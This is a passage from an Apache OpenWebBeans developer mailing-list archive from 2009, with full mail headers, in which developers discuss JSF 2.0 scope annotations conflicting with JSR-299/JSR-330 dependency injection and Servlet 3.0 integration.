Gavin and Pete to at least use @Scope for JSR= -299 scopes, but they refused so far. I hope that there will be a really we= ll founded _technical_ discussion on this topic in the very near future tho= ugh! > +1 this is all political issues... sucks for the poor developers. > My 'vision': > > *) JSR-330 defines the basic annotations for DI in Java generally > *) JSR-299 defines the annotations for EE related stuff (@SessionScoped, = RequestScoped) BASED ON JSR-330! > *) JSF2 uses the @SessionScoped from JSR-299. Why should JSF define own a= nnotations? Even if you don't like to use any 299 container, you may still = use the annotations defined in the API and provide an own small DI like MyF= aces does it right now. Don't know if it makes sense at all to reinvite the= wheel 10000 times... ;) > Imagine you don't use EJB or anything else from JAvaEE, just JSF (and a servlet container). A dependency to 299-impl is a little heavy, right ? Heck, what we need is clean, simple and extensible injection "container" in SE land. Which is the base for every damn thing. -Matthias > > LieGrue, > strub > > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > >> From: Matthias Wessendorf <[email protected]> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >> To: [email protected] >> Date: Wednesday, August 26, 2009, 5:45 PM >> On Wed, Aug 26, 2009 at 5:39 PM, Mark >> Struberg<[email protected]> >> wrote: >> > In fact we (OWB) should provide standard context >> implementations for JSF annotated scopes. >> > >> > The whole picture: >> > >> > .) =A0JSF scanns the classpath for JSF annotations >> > >> > .) OWB scanns the classpath for JSR-299 annotations >> > >> > In fact, I assume (not having looked at the code) that >> MyFaces provides kind of a mini DI container in the EL code. >> So any EL which will get through to the faces EL handler >> will successfully resolve those scoped beans >> > >> > Otoh, OWB also provides an EL handler which is >> dominant (prior in the EL chain). OWB currently simply >> ignores the javax.faces.scope annotations since they are >> 'unknown' for OWB. So this very class will look like a bean >> which has no [email protected]. >> > >> > >> > The problem arises latest if JSF scoped beans need to >> be injected into JSR-299 beans and vice versa... >> > >> > an idea how to resolve this: >> > We need to provide context implementations for the >> faces scopes in the webbeans-jsf module and let OWB do all >> the resolving. >> > >> > wdyt? >> >> yes, that's true. It is really a PITA to have three >> different ways to >> @inject stuff (in JavaEE - well the javax.faces.bean.** >> stuff is >> optional) >> >> I am pretty sure this will actually cause lot's of pain, >> trouble and >> bad blogs on JavaEE 6 (heck, deserved! :-) ) >> >> Are you able to bring this dilemma up on some EG ? >> (mismatch of all the stuff) >> >> -Matthias >> >> > >> > LieGrue, >> > strub >> > >> > >> > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> >> wrote: >> > >> >> From: Matthias Wessendorf <[email protected]> >> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations >> ? >> >> To: [email protected] >> >> Date: Wednesday, August 26, 2009, 5:26 PM >> >> On Wed, Aug 26, 2009 at 5:23 PM, >> >> Matthias Wessendorf<[email protected]> >> >> wrote: >> >> > On Wed, Aug 26, 2009 at 5:17 PM, Mark >> Struberg<[email protected]> >> >> wrote: >> >> >> for what I know (discussion on wb-dev) >> JSF apps >> >> should use JSR-299 @ScopeType annotated scopes >> (renamed to >> >> @NormalScope in the latest spec) and not faces >> scopes. I did >> >> hope that we could unify all scopes by generally >> using >> >> JSR-330 javax.inject.Scope in all EE fields. But >> that will >> >> not work until JSR-299 also recognizes and treats >> JSR-330 >> >> scopes as normal scopes. >> >> >> >> >> > >> >> > WTF ? :) >> >> > >> >> > It is kinda odd that JSF 2.0 has should use >> the 299 >> >> stuff. Standalone, >> >> > ok all fine (not tested). >> >> > But even if there are both in the game jsf2.0 >> and 299, >> >> they should >> >> > just work (or at least I should >> >> > get a warning that the bean is using a (good) >> -sorry- >> >> incorrect... annotation. >> >> > >> >> > Basically this is a total mess. Annontations >> work >> >> standalone, but not >> >> > when adding some heavyweight >> >> > stuff (like 299) to the game ? Oh boy... >> >> >> >> I am pretty sure that this will introcude a lot of >> fun to >> >> folks >> >> writing JSF 2.0 applications, >> >> if your statement is true. That would worse than >> the JSP >> >> 2.1 >> >> dependency (with JSF 1.2) >> >> >> >> I filed this bug: >> >> https://issues.apache.org/jira/browse/OWB-133 >> >> >> >> At least there should be some help. Not everybody >> is >> >> thrilled to >> >> replace annotations based on >> >> the environment (at least not me) >> >> >> >> > >> >> > -Matthias >> >> > >> >> >> LieGrue, >> >> >> strub >> >> >> >> >> >> >> >> >> --- On Wed, 8/26/09, Matthias Wessendorf >> <[email protected]> >> >> wrote: >> >> >> >> >> >>> From: Matthias Wessendorf <[email protected]> >> >> >>> Subject: Re: WebBeans "eating" JSF >> 2.0 >> >> annotations ? >> >> >>> To: [email protected] >> >> >>> Date: Wednesday, August 26, 2009, >> 5:11 PM >> >> >>> has no effect. The beast can't find >> >> >>> the JSF beans. >> >> >>> Due to lack of time, I am going with >> JSF 2.0 >> >> standalone. >> >> >>> >> >> >>> Question is: as it was working the >> current >> >> behavior is a >> >> >>> regression, >> >> >>> has there been any testing on OBW + >> JSF 2.0 ? >> >> >>> >> >> >>> -Matthias >> >> >>> >> >> >>> On Wed, Aug 26, 2009 at 3:45 PM, >> Gurkan >> >> Erdogdu<[email protected]> >> >> >>> wrote: >> >> >>> > It must not eat. >> >> >>> > >> >> >>> > But one point, >> >> >>> > >> >> >>> > You still use old XML >> configuration file >> >> format. As a >> >> >>> default OWB uses new >> >> >>> > XML format. Add >> >> >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/s= amples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properti= es >> >> >>> > >> >> >>> > in your project >> >> resources/META-INF/openwebbeans folder >> >> >>> and sure that all >> >> >>> > libraries are ok. >> >> >>> > >> >> >>> > You can look necessary libs >> from >> >> guess.war . You can >> >> >>> create it from mvn >> >> >>> > package -Pjetty. >> >> >>> > >> >> >>> > --Gurkan >> >> >>> > >> >> >>> > >> >> >>> > 2009/8/26 Matthias Wessendorf >> <[email protected]> >> >> >>> > >> >> >>> >> Hi, >> >> >>> >> >> >> >>> >> is it possible that the >> current trunk >> >> is _eating_ >> >> >>> JSF 2.0 annotations ? >> >> >>> >> >> >> >>> >> <someCode> >> >> >>> >> ... >> >> >>> >> import >> javax.faces.bean.ManagedBean; >> >> >>> >> import >> >> javax.faces.bean.SessionScoped; >> >> >>> >> >> >> >>> >> >> @ManagedBean(name=3D"playersBean") >> >> >>> >> @SessionScoped >> >> >>> >> public class ViewParamsBean >> >> >>> >> { >> >> >>> >> ... >> >> >>> >> </someCode> >> >> >>> >> >> >> >>> >> In June (before reflecting >> the >> >> >>> javax.enterprise.context changes) it >> was >> >> >>> >> working. >> >> >>> >> Now expressions like >> #{playersBean} >> >> are simply >> >> >>> ignored ;-) >> >> >>> >> >> >> >>> >> Demo project is here: >> >> >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >> >>> >> >> >> >>> >> -Matthias >> >> >>> >> >> >> >>> >> >> >> >>> >> -- >> >> >>> >> Matthias Wessendorf >> >> >>> >> >> >> >>> >> blog: http://matthiaswessendorf.wordpress.com/ >> >> >>> >> sessions: http://www.slideshare.net/mwessendorf >> >> >>> >> twitter: http://twitter.com/mwessendorf >> >> >>> >> >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > -- >> >> >>> > Gurkan Erdogdu >> >> >>> > http://gurkanerdogdu.blogspot.com >> >> >>> > >> >> >>> >> >> >>> >> >> >>> >> >> >>> -- >> >> >>> Matthias Wessendorf >> >> >>> >> >> >>> blog: http://matthiaswessendorf.wordpress.com/ >> >> >>> sessions: http://www.slideshare.net/mwessendorf >> >> >>> twitter: http://twitter.com/mwessendorf >> >> >>> >> >> >> >> >> >> >> >> >> >> >> >> >> >> > >> >> > >> >> > >> >> > -- >> >> > Matthias Wessendorf >> >> > >> >> > blog: http://matthiaswessendorf.wordpress.com/ >> >> > sessions: http://www.slideshare.net/mwessendorf >> >> > twitter: http://twitter.com/mwessendorf >> >> > >> >> >> >> >> >> >> >> -- >> >> Matthias Wessendorf >> >> >> >> blog: http://matthiaswessendorf.wordpress.com/ >> >> sessions: http://www.slideshare.net/mwessendorf >> >> twitter: http://twitter.com/mwessendorf >> >> >> > >> > >> > >> > >> >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 16:23:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1624 invoked from network); 26 Aug 2009 16:23:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:23:17 -0000 Received: (qmail 76641 invoked by uid 500); 26 Aug 2009 16:23:17 -0000 Delivered-To: [email protected] Received: (qmail 76618 invoked by uid 500); 26 Aug 2009 16:23:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76608 invoked by uid 99); 26 Aug 2009 16:23:17 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:23:17 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:23:05 +0000 Received: by ewy4 with SMTP id 4so343140ewy.27 for <[email protected]>; Wed, 26 Aug 2009 09:22:45 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=f0VfaRTbBJ1LpEse+0cKns2RBzDwRpv/q7uaBET36QM=; b=TLy1dVL16m7lYpLQ2JYqLHoGaefDpzH5QdMz8OKxO5ljbW/DfC246jV/aNBt8gFfQ2 hxnBeIUCT6Yz5Yw6cjKPTIwWnigKiMBTWHXZPor60CwnoEJ8xGJMjDEvqxjEt+4hvUsQ QmvlKL+fSYPpyfib4NlG3gqdc6DGFqb1x0VdQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=ivSpeUXokc4HqJKPFLSH+FiVceI2M+cS9NHUP7HurLOuLonXWdRwwFpXND7+Fwrrdz Onx0u4RS+CxiK6o+FpfoBgp98meL+iXcBsP3Lm0kKvXBPsE3l2ZvmcQWw9f8ThItUe8L Z7mGhRqnCCgf5VFKUpGUDb9c0L+C0pwYLFgFM= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m17mr7261915ebd.7.1251303754941; Wed, 26 Aug 2009 09:22:34 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 19:22:34 +0300 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c177cd1c63104720ddb36 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c177cd1c63104720ddb36 Content-Type: text/plain; charset=ISO-8859-1 >>>has there been any testing on OBW + JSF 2.0 ? No. But will try. --Gurkan 2009/8/26 Matthias Wessendorf <[email protected]> > has no effect. The beast can't find the JSF beans. > Due to lack of time, I am going with JSF 2.0 standalone. > > Question is: as it was working the current behavior is a regression, > has there been any testing on OBW + JSF 2.0 ? > > -Matthias > > On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]> > wrote: > > It must not eat. > > > > But one point, > > > > You still use old XML configuration file format. As a default OWB uses > new > > XML format. Add > > > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties > > > > in your project resources/META-INF/openwebbeans folder and sure that all > > libraries are ok. > > > > You can look necessary libs from guess.war . You can create it from mvn > > package -Pjetty. > > > > --Gurkan > > > > > > 2009/8/26 Matthias Wessendorf <[email protected]> > > > >> Hi, > >> > >> is it possible that the current trunk is _eating_ JSF 2.0 annotations ? > >> > >> <someCode> > >> ... > >> import javax.faces.bean.ManagedBean; > >> import javax.faces.bean.SessionScoped; > >> > >> @ManagedBean(name="playersBean") > >> @SessionScoped > >> public class ViewParamsBean > >> { > >> ... > >> </someCode> > >> > >> In June (before reflecting the javax.enterprise.context changes) it was > >> working. > >> Now expressions like #{playersBean} are simply ignored ;-) > >> > >> Demo project is here: > >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ > >> > >> -Matthias > >> > >> > >> -- > >> Matthias Wessendorf > >> > >> blog: http://matthiaswessendorf.wordpress.com/ > >> sessions: http://www.slideshare.net/mwessendorf > >> twitter: http://twitter.com/mwessendorf > >> > > > > > > > > -- > > Gurkan Erdogdu > > http://gurkanerdogdu.blogspot.com > > > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c177cd1c63104720ddb36-- From [email protected] Wed Aug 26 16:26:05 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2068 invoked from network); 26 Aug 2009 16:26:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:26:05 -0000 Received: (qmail 80176 invoked by uid 500); 26 Aug 2009 16:26:05 -0000 Delivered-To: [email protected] Received: (qmail 80152 invoked by uid 500); 26 Aug 2009 16:26:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80142 invoked by uid 99); 26 Aug 2009 16:26:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:26:05 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:25:53 +0000 Received: by ewy4 with SMTP id 4so346023ewy.27 for <[email protected]>; Wed, 26 Aug 2009 09:25:33 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=Df2FpwkaRgXxBJeJuI/biSTbU8yTpV4bRzxRSPgzN0U=; b=k9ik+1foV3v+9fVd3uqQTVqqZnXtuNZxCkSYfTn++mewzbisQbZmxcfE1ylA7WVvyX DgydTKXB4UVacsxC5DKLY1w3wfgdozh+vXULQrF84Uqm7VDEA58iopDgPAT0f7T9Pmva DXwE8bIgrRGCK88g7qnOqIwpVgEU34IwUTwcg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=SP4sennyMQ6X/xsfu3PoTRa22Ydz5zD6CPxH+59syuySMOX4TWSl2afU863EIZJOkW 2j1eD8jsqIaSWK8AZfjrh4aoYoGz+v7GwgoVPq3lhld1RDh1p6RKAhyqBGFKHx3xVM1P GIjAR+6D3d4dfqGUBAsXZZWEi+VTfwXtvytaA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l16mr8079339ebb.76.1251303931495; Wed, 26 Aug 2009 09:25:31 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 26 Aug 2009 19:25:31 +0300 Message-ID: <[email protected]> Subject: Re: Servlet 3.0 ? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c0f0457c5f204720de615 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c0f0457c5f204720de615 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Maybe Geronimo Java EE 6 OWB integration can add this filter automatically to a web module. Maybe Geronimo MyFaces integration can handle this via looking META-INF/beans.xml file. 2009/8/26 Matthias Wessendorf <[email protected]> > Hello, > > as WebBeans spec is kinda late - so is Servlet 3.0 - I was wondering > if you guys could leverage some of their stuff, > like the @Filter annotation or the "web-xml fragments" stuff ? (e.g. > for WebBeansJSFFilter), for the -jsf module ? > > Thx, > Matthias > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c0f0457c5f204720de615-- From [email protected] Wed Aug 26 16:29:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3827 invoked from network); 26 Aug 2009 16:29:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:29:12 -0000 Received: (qmail 84081 invoked by uid 500); 26 Aug 2009 16:29:12 -0000 Delivered-To: [email protected] Received: (qmail 84062 invoked by uid 500); 26 Aug 2009 16:29:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84052 invoked by uid 99); 26 Aug 2009 16:29:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:29:12 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27806.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 16:29:02 +0000 Received: (qmail 4645 invoked by uid 60001); 26 Aug 2009 16:28:39 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1251304119; bh=CfL/jIIs0Ip9mMq5LhEKMQw0263vRLP3ZkW+7Al208g=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=U+PrK/jKir/2rW3c4IszqgeXrLxdddEXv+cqaKZMP3Kk0vYAJYWyhOlEro89QByuIPmgysW7TWLPWsvKnP80h4yvQB2NCcBWRh6AHda6WKKZpPmg2JtvyEYLpF+ZZNoITVuoiDZx+sIN5aNhiHc0GNEFgBpiltl8Y3FJpzEfpzw= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=q04ZYz71hxmkGnzpOHObVB/p6xcPGZYNNbSQQXJEX1waANspLHH/Ihdlw5CVikz0Evh/ZkXLGtxMs+Ru6k3HDTLn+CPn4gNg4U1Oa4XeLgcO3Lap8LKFwhoY8E9WLMzg4sUcMm4/oJ3EyQhBc14GrvdnMx9x2TrPU9oieFYwLyo=; Message-ID: <{{EMAIL+PHONE}}> X-YMail-OSG: wHAC2mAVM1lYgZ1lFM3yLV2kzKJb9ocHBmL58bQDExQTCpB_NEsTCGFH2EdUVjZOrF0Wq4ImmFRq83Agn7zf5qScbzxkPmnrBjI8TVM3YpF1HOnLzdAxaiE3UKmKv1z0H5jIuOHg8xMqVBoEKiDQiAmm95XcQzQrnrSv9RjqKspfzm7eboKRAjEPzzUrK9SdM0H4Ti2ZvDZRu9V_cbfp49u5Wpv76USipni3EoMFmwlBvTLqjtJhbtwd7x1VGRu0_LwkN1WykAhZu9gmawYK.7RgqAUIBkUBifTyGUegng1p_F74Vwd5O3Xp.QdKEC1ozFgmYM92vV4t6CjVmVD9Qgo0ryYRiccxxedWK4uqusA.fsVPhDwlFsa7CXu8t.xw5yu6N1U- Received: from [161.129.204.104] by web27806.mail.ukl.yahoo.com via HTTP; Wed, 26 Aug 2009 16:28:39 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.338.2 Date: Wed, 26 Aug 2009 16:28:39 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org > Imagine you don't use EJB or anything else from JAvaEE, > just JSF (and > a servlet container). A dependency to 299-impl is a little > heavy, right ? I didn't say webbeans-impl, but only the jsr299-api package! This only contains annotations and a few interfaces, so you won't get any additional dependendies. LieGrue, strub --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > From: Matthias Wessendorf <[email protected]> > Subject: Re: WebBeans "eating" JSF 2.0 annotations ? > To: [email protected] > Date: Wednesday, August 26, 2009, 6:10 PM > On Wed, Aug 26, 2009 at 6:05 PM, Mark > Struberg<[email protected]> > wrote: > > Matze, > > I think this would all become ok if _all_ the EE6 > parts will simply use the JSR-330 javax.inject.Scope > annotation as basis for their scopes. > > +1 > > > This would make at least the classpath scanning part a > hell lot easier (the context implementation in the > background still needs to be coded for each DI part, > > because there is no API defined for it except in > JSR-299). > > I agree > > > > > > > I already tried to convince Gavin and Pete to at least > use @Scope for JSR-299 scopes, but they refused so far. I > hope that there will be a really well founded _technical_ > discussion on this topic in the very near future though! > > > > +1 this is all political issues... sucks for the poor > developers. > > > My 'vision': > > > > *) JSR-330 defines the basic annotations for DI in > Java generally > > *) JSR-299 defines the annotations for EE related > stuff (@SessionScoped, RequestScoped) BASED ON JSR-330! > > *) JSF2 uses the @SessionScoped from JSR-299. Why > should JSF define own annotations? Even if you don't like to > use any 299 container, you may still use the annotations > defined in the API and provide an own small DI like MyFaces > does it right now. Don't know if it makes sense at all to > reinvite the wheel 10000 times... ;) > > > > Imagine you don't use EJB or anything else from JAvaEE, > just JSF (and > a servlet container). A dependency to 299-impl is a little > heavy, > right ? > > Heck, what we need is clean, simple and extensible > injection > "container" in SE land. Which is the base for every damn > thing. > > -Matthias > From [email protected] Wed Aug 26 19:08:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84835 invoked from network); 26 Aug 2009 19:08:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 19:08:54 -0000 Received: (qmail 41389 invoked by uid 500); 26 Aug 2009 19:08:54 -0000 Delivered-To: [email protected] Received: (qmail 41376 invoked by uid 500); 26 Aug 2009 19:08:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41366 invoked by uid 99); 26 Aug 2009 19:08:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 19:08:54 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 19:08:43 +0000 Received: by ewy4 with SMTP id 4so501774ewy.27 for <[email protected]>; Wed, 26 Aug 2009 12:08:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type; bh=vpH6gB1VVFTS5VWi446mKFzWmjAj8Bt3UJUe679TtTA=; b=DJuhttTsKDxy3+IlkSa1s/SCTXfkmmVJxXQyNItO0a2+y4G4S+JnsUqF13rfB3LDM7 M8kWwnxUowEJfe+Y4jzfbpRE2KrsuX3tonWsh7uypjz1tEJg5basuMafiXHd/+/SlEI2 2zIeYqwXx4iAkhvscro0+aOpmrmb4ulxKWYys= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type; b=NTdP7x2eKNK9fV+IeIFq4Vve5Xvsu0PBk0lNHwzmyT/KamEvyyjC07hQaokmoMl20S 8CcUEkLK9kAPzFY/SM0x/2Xjo/6twgSHHgZN5hUH6ZusEj2pEK6ys++QMV1rugrzGphC Gp5KJM5wnjqptTJAbrvg0VmKyIzqRAcXfP34o= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id k4mr8648127ebd.89.1251313701479; Wed, 26 Aug 2009 12:08:21 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 21:08:20 +0200 X-Google-Sender-Auth: 10ee4a30f57e1245 Message-ID: <[email protected]> Subject: Re: Servlet 3.0 ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 6:25 PM, Gurkan Erdogdu<[email protected]> wrote: > Maybe Geronimo Java EE 6 OWB integration can add this filter automatically > to a web module. Maybe Geronimo MyFaces integration can handle this via > looking META-INF/beans.xml file. that would be a benefit. Let's keep this in mind when it comes to that time. > > 2009/8/26 Matthias Wessendorf <[email protected]> > >> Hello, >> >> as WebBeans spec is kinda late - so is Servlet 3.0 - I was wondering >> if you guys could leverage some of their stuff, >> like the @Filter annotation or the "web-xml fragments" stuff ? (e.g. >> for WebBeansJSFFilter), for the -jsf module ? >> >> Thx, >> Matthias >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 20:30:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6733 invoked from network); 26 Aug 2009 20:30:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 20:30:35 -0000 Received: (qmail 61300 invoked by uid 500); 26 Aug 2009 20:30:35 -0000 Delivered-To: [email protected] Received: (qmail 61269 invoked by uid 500); 26 Aug 2009 20:30:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61259 invoked by uid 99); 26 Aug 2009 20:30:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 20:30:35 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f221.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 20:30:24 +0000 Received: by bwz21 with SMTP id 21so408565bwz.12 for <[email protected]>; Wed, 26 Aug 2009 13:30:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:x-mailer :mime-version:subject:date:references; bh=kWXASeezIi+KOudghhvXxWUHIE9X6lYNcVi2XpumFrU=; b=uW98+SlwcayJp1lLWKAMJCCVRrW4p/uO9w4dd6ZgkO0N9HXN9JC744kZ3dmY3s0M2q ahLGYaB+u3nhNGyDMa8z3b6EY3adk7kNNkciaGWX8Aym1j933x6acBr+XOBIik7xFUjw lIF0+Pd9AvQPsHkZf30l/lFI7TKWmeg3E+LSE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:x-mailer:mime-version:subject:date :references; b=uK4rX1XGeLo6jFGyFeSMgQjRUzGgZntzZdDVMfgG34TXeWfVQcSBYbupQFEojCEWp6 